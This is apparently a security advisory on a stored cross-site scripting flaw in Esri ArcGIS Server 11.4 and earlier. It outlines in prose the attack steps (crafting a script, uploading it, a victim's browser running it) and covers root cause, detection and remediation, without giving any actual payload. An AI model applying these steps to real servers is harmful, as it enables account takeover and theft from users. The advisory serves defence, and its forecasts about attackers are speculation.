Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack, allowing unauthenticated attackers to inject malicious code into the server. This vulnerability enables attackers to compromise user browsers, potentially leading to account takeover and data exfiltration.
Step 1: Payload Creation: The attacker crafts a malicious JavaScript payload designed to execute within a victim's browser. This payload could be designed to steal cookies, redirect users to phishing sites, or perform other malicious actions.
Step 2: File Upload: The attacker uploads a file containing the malicious JavaScript payload to the ArcGIS Server. The server, due to the vulnerability, fails to properly sanitize or filter the file content.
Step 3: File Storage: The ArcGIS Server stores the uploaded file, including the malicious JavaScript, within its file system.
Step 4: Victim Interaction: A legitimate user accesses a resource on the ArcGIS Server that references the uploaded file. This could be through a map service, a web application, or other ArcGIS Server functionality.
Step 5: Payload Execution: The victim's browser renders the file content, including the malicious JavaScript. The JavaScript executes within the context of the user's browser, allowing the attacker to perform actions on behalf of the user.
The vulnerability stems from insufficient input validation and sanitization of user-supplied data when storing files within the ArcGIS Server environment. Specifically, the server fails to properly sanitize user-uploaded files, allowing an attacker to inject malicious JavaScript code within the file content. When a legitimate user accesses the stored file, the malicious JavaScript executes within the context of their browser, leading to XSS. The root cause is likely a missing or inadequate filter in the file upload and storage process, allowing the attacker to bypass security measures and persist malicious payloads within the server's file system. This lack of proper input validation allows the attacker to craft a payload that is then served to other users.
While no specific APT groups are definitively linked at this time, the nature of the vulnerability makes it attractive to a wide range of attackers. It is likely that both state-sponsored actors and financially motivated cybercriminals will exploit this vulnerability. The vulnerability is likely to be added to the CISA KEV list due to its high impact and ease of exploitation.
Network traffic analysis: Look for unusual HTTP requests containing JavaScript code within file uploads or responses from the ArcGIS Server.
File system monitoring: Monitor the ArcGIS Server's file system for the creation of unexpected files, especially those with suspicious content or extensions.
Web application firewall (WAF) logs: Review WAF logs for blocked requests that may indicate XSS attempts.
Intrusion detection system (IDS) alerts: Configure IDS rules to detect XSS payloads in HTTP traffic.
Endpoint Detection and Response (EDR) monitoring: Monitor endpoints for suspicious browser behavior or JavaScript execution.
Upgrade to ArcGIS Server 11.5 or later. This is the primary and most effective remediation step.
Implement a Web Application Firewall (WAF) to filter and block malicious requests, including XSS payloads.
Implement robust input validation and output encoding to sanitize all user-supplied data, especially during file uploads.
Regularly scan the ArcGIS Server file system for suspicious files.
Review and harden the ArcGIS Server configuration, including disabling unnecessary features and services.
Implement a content security policy (CSP) to restrict the execution of JavaScript from untrusted sources.